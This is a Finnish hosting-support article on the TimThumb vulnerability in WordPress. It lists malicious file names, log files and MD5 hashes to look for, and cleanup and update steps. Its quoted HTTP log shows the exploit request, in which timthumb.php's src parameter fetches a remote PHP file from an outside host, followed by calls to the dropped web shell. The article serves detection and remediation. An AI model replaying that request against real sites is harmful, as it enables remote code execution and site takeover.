WordPressin tietoturvaongelma: TimThumb

TimThumb on työkalu, jota WordPressin teemat ja laajennukset käyttävät kuvien koon muuttamiseen. TimThumbin vanhoissa versioissa on tietoturvahaavoittuvuus, jonka avulla hyökkääjät voivat ladata haitallisia ("pahoja") tiedostoja toiselta verkkosivustolta. Ensimmäinen haitallinen tiedosto antaa sitten hyökkääjän ladata lisää haitallisia tiedostoja verkkohotellitilille.

Lisätietoja tietoturvaongelmista ja niiden selvittämisestä saat täältä: Entä jos verkkosivustoni on hakkeroitu?.

Merkkejä siitä, että tietoturvasi on vaarantunut

Kohdassa Entä jos verkkosivustoni on hakkeroitu? mainittujen merkkien lisäksi voit havaita sivustosi altistuneen tälle tietoturvaongelmalle, jos tilisi laajennushakemistossa on seuraavan tyyppisiä tiedostoja:

  • external_[md5-tarkistussumma].php – esimerkiksi: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5-tarkistussumma].php – esimerkiksi: 7eebe45bde5168488ac4010f0d65cea8.php

Löydät esimerkkejä mahdollisista md5-tarkistussummista tämän artikkelin osiosta Tunnettujen haitallisten tiedostojen MD5-tarkistussummia.

Saatat myös löytää seuraavia tiedostoja verkkosivustosi juurihakemistosta (lisätietoa):

  • x.txt
  • logx.txt

Korjaavat toimenpiteet

Sinun on poistettava kaikki vaarantuneet ja vialliset tiedostot. Ennen kuin poistat mitään, suosittelemme, että teet varmuuskopion verkkosivustostasi (lisätietoa).

Haitallisten tiedostojen löytäminen

Haitalliset tiedostot, jotka on alun perin ladattu TimThumbin haavoittuvuuden kautta, sijaitsevat tyypillisesti jossakin seuraavista hakemistoista samassa /theme- tai /plugin-hakemistossa, jossa haavoittuvainen TimThumb-tiedosto sijaitsee.

  • /tmp
  • /cache
  • /images

Esimerkkejä haitallisten tiedostojen sijainneista:

[webroot]/wp-content/themes/[teema, joka sisältää haavoittuvan TimThumbin]/cache/images/

Esimerkkejä haitallisten tiedostojen nimistä näissä kohteissa:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Tiedostot x.txt ja logx.txt sisältävät tietoa siitä, milloin haitallinen tiedosto laadittiin käyttämällä TimThumbin haavoittuvuutta, ja haitallisen tiedoston sijainnista verkkohotellitilillä. Tämä tieto on hyödyllistä määritettäessä, mitkä tiedostot on poistettava ja mistä ne löytyvät. Ei kuitenkaan ole todennäköistä, että lista poistettavista tiedostoista on täydellinen.

Esimerkki:

Päivä: Torstai, 11 huh 2013 06:21:15 -0700
IP: X.X.X.X
Selain: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[teema, joka sisältää haavoittuvan TimThumbin]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Poistettavat tiedostot

Kun olet luonut varmuuskopion sivustostasi, poista seuraavat tiedostot:

  • x.txt
  • logx.txt
  • external_[md5-tarkistussumma].php – esimerkiksi: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5-tarkistussumma].php – esimerkiksi: 7eebe45bde5168488ac4010f0d65cea8.php
  • Muut löydetyt haitalliset PHP-tiedostot, joiden nimessä on md5-tarkistussumma.

Voit tehdä tämän FTP:llä (lisätietoa) verkkohotellitilisi ohjauspaneelissa olevan tiedostonhallinnan kautta (lisätietoa).

Sinun pitäisi myös:

  • päivittää kaikki teemasi ja laajennuksesi uusimpaan versioon
  • korvata kaikki TimThumb.php:n esiintymät uusimmalla versiolla, joka löytyy täältä.

Teknistä tietoa

Otos HTTP-lokeista

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[teema, joka sisältää haavoittuvan TimThumbin]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[teema, joka sisältää haavoittuvan TimThumbin]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[teema, joka sisältää haavoittuvan TimThumbin]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[teema, joka sisältää haavoittuvan TimThumbin]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

Tunnettujen haitallisten tiedostojen MD5-tarkistussummia

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Muita haitallisia tiedostoja

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Oliko tästä artikkelista hyötyä?
Kiitoksia palautteestasi. Jos haluat puhua asiakaspalveluedustajan kanssa, käytä yllä näkyvää puhelinnumeroa tai chat-vaihtoehtoa.
Kiva, että meistä oli apua. Voimmeko tehdä jotain muuta?
Olen pahoillani asiasta. Kerro meille, mikä on epäselvää tai miksi ratkaisu ei toiminut oman ongelmasi kohdalla.